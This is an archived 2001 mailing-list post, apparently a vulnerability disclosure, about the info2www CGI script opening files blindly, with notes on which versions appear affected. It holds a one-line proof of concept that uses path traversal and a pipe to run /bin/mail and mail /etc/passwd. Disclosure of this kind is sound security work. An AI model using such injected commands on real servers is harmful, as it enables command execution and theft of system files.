Hi, Some versions of the info2www CGI blindly open files: $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passw d|)' $ You have new mail. $ Trying to track down which versions of info2www have this bug and which don't has been difficult, there are lots of variants out there, some of which aren't vulnerable. Instead of trying to make a list of versions which are vulnerable I'll just say that: - if it has no version number, its probably vulnerable - the uuencoded version at CPAN is corrupt, and the one which the README file tells you to get is vulnerable - version 1.1 is vulnerable - version 1.2.x seem ok (but I'm no perl expert) Apparently info2www is based on info2html and infogate, so these may have problems too. Niall
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:43:39 PDT